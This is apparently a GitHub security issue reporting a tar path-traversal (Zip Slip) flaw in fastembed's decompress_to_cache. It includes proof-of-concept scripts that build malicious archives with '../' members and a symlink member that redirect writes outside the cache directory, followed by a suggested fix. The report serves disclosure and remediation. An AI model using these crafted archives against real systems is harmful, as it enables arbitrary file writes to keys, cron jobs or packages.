[Bug]: Tar path traversal (Zip Slip) in decompress_to_cache — arbitrary file write outside cache directory #626

## Summary

The `decompress_to_cache` method uses `tarfile.extractall()` without sanitizing member paths, making it vulnerable to **Zip Slip / Tar Slip** (CVE-2007-4559 class). A malicious tar archive can write files to arbitrary locations outside `cache_dir`.

**Note:** This is related to but distinct from #327, which tracks the DeprecationWarning/platform compatibility aspect. This issue specifically addresses the **security vulnerability** — path traversal allowing arbitrary file writes.

## Affected Code

**File:** `fastembed/common/model_management.py`, lines 304–311

```python
@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
    # ...
    with tarfile.open(targz_path, "r:gz") as tar:
        tar.extractall(
            path=cache_dir,   # No filter, no member sanitization
        )
```
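Without a filter, `extractall` writes each member to (roughly) `os.path.join(path, member.name)`, and the filesystem resolves any `..` components when the file is opened. The sketch below uses `posixpath` to show where a member named `../../tmp/fastembed_pwned.txt` lands relative to a cache directory. The cache path is hypothetical and chosen only for illustration; it is not fastembed's actual default.

```python
import posixpath

# Hypothetical cache location, used only for illustration
cache_dir = "/home/user/.cache/fastembed"
member_name = "../../tmp/fastembed_pwned.txt"

# Join the member name onto the destination, then collapse the ".." components
resolved = posixpath.normpath(posixpath.join(cache_dir, member_name))
print(resolved)  # /home/user/tmp/fastembed_pwned.txt
print(resolved.startswith(cache_dir + "/"))  # False: the target is outside cache_dir
```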

## Reproduction

```python
import io
import os
import tarfile
import tempfile

from fastembed.common.model_management import ModelManagement

cache_dir = tempfile.mkdtemp()
# A file one level above cache_dir, i.e. outside the intended extraction root.
# Computed from cache_dir so the check works regardless of the temp-dir layout.
target = os.path.join(os.path.dirname(cache_dir), "fastembed_pwned.txt")

# Create a malicious tar whose member name climbs out of cache_dir
with tempfile.NamedTemporaryFile(suffix=".tar.gz", delete=False) as f:
    evil_tar = f.name

with tarfile.open(evil_tar, "w:gz") as tar:
    payload = b"PWNED"
    info = tarfile.TarInfo(name="../fastembed_pwned.txt")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

# Call decompress_to_cache with this tar
ModelManagement.decompress_to_cache(evil_tar, cache_dir)

# File written outside cache_dir:
print(os.path.exists(target))  # True (on Python < 3.14, where no extraction filter is applied by default)
```

## Attack Surface

- Custom model URLs registered via `add_custom_model()` that point to attacker-controlled servers
- Compromised Hugging Face repositories or GCS buckets (supply-chain attack)
- Man-in-the-middle (MITM) tampering with a download, e.g. via an HTTP redirect

## Impact

- **Arbitrary file write** to any path writable by the process (SSH keys, cron jobs, Python packages, shell configs)
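- On Python 3.14, the default extraction `filter` changes to `'data'`, which changes extraction behavior without any code change: members with absolute paths, `..` traversal, or links resolving outside `cache_dir` raise an error instead of being extracted, which may break existing archives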
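The self-contained sketch below shows what the `'data'` filter does with a traversal member: instead of writing outside the destination, `extractall` raises `tarfile.OutsideDestinationError` (a subclass of `tarfile.FilterError`). The helper names are hypothetical, and the archive is built in memory; on interpreters without extraction filters the sketch reports `unsupported` rather than extracting anything.

```python
import io
import tarfile
import tempfile


def build_traversal_archive() -> bytes:
    """Build an in-memory .tar.gz with a single member named '../fastembed_pwned.txt'."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        payload = b"PWNED"
        info = tarfile.TarInfo(name="../fastembed_pwned.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def extract_with_data_filter(archive: bytes, dest: str) -> str:
    """Extract with filter='data'; return 'extracted' or the filter error's class name."""
    if not hasattr(tarfile, "data_filter"):
        return "unsupported"  # interpreter predates extraction filters (PEP 706)
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        try:
            tar.extractall(path=dest, filter="data")
        except tarfile.FilterError as exc:
            return type(exc).__name__
    return "extracted"


print(extract_with_data_filter(build_traversal_archive(), tempfile.mkdtemp()))
```

On an interpreter that supports extraction filters this prints `OutsideDestinationError`, and nothing is written outside the temporary destination.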

## Suggested Fix

Use the `'data'` extraction filter where the interpreter supports it, and validate every member before extracting on older interpreters:

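```python
import os
import tarfile


@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
    with tarfile.open(targz_path, "r:gz") as tar:
        if hasattr(tarfile, "data_filter"):
            # Extraction filters exist on Python 3.12+ and in 3.8 through 3.11 security
            # releases; 'data' rejects absolute paths, '..' traversal and links that
            # resolve outside cache_dir.
            tar.extractall(path=cache_dir, filter="data")
        else:
            # Older interpreters: validate every member before extracting anything
            root = os.path.realpath(cache_dir)
            for member in tar.getmembers():
                # Allow only plain files and directories; symlinks, hard links and
                # device files could redirect later writes outside cache_dir.
                if not (member.isfile() or member.isdir()):
                    raise ValueError(f"Unsupported tar member type: {member.name}")
                member_path = os.path.realpath(os.path.join(root, member.name))
                # commonpath also accepts the root itself (e.g. a "./" member)
                if os.path.commonpath([root, member_path]) != root:
                    raise ValueError(f"Unsafe tar member path: {member.name}")
            tar.extractall(path=cache_dir)
    # ... (remainder of the method, including its return value, unchanged)
```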
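A check on member names alone does not cover links. A symlink member can point outside the destination, and a later member written *through* that link passes a name-only check, because the link does not exist yet when the names are validated. The sketch below (hypothetical helper names; it only inspects the archive and never extracts it) builds such an archive and shows a name-only check accepting it.

```python
import io
import os
import tarfile
import tempfile


def name_only_check(tar: tarfile.TarFile, dest: str) -> bool:
    """Return True if every member *name* resolves inside dest (link targets are not inspected)."""
    root = os.path.realpath(dest)
    for member in tar.getmembers():
        path = os.path.realpath(os.path.join(root, member.name))
        if os.path.commonpath([root, path]) != root:
            return False
    return True


def build_symlink_archive() -> bytes:
    """Tar with a symlink 'escape' -> /tmp, followed by a file written through that link."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        link = tarfile.TarInfo(name="escape")
        link.type = tarfile.SYMTYPE
        link.linkname = "/tmp"  # example target outside any extraction directory
        tar.addfile(link)
        payload = b"PWNED"
        info = tarfile.TarInfo(name="escape/fastembed_pwned.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


dest = tempfile.mkdtemp()
with tarfile.open(fileobj=io.BytesIO(build_symlink_archive()), mode="r:gz") as tar:
    print(name_only_check(tar, dest))  # True: every name looks safe
    print([m.name for m in tar.getmembers() if m.issym()])  # ['escape']
```

Link members therefore need to be rejected outright or have their targets validated too; the `'data'` filter does the latter, raising an error for absolute link targets and for links that resolve outside the destination.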

---

*Found via automated codebase analysis. Confirmed independently by three reviewers (Claude, Codex, Gemini).*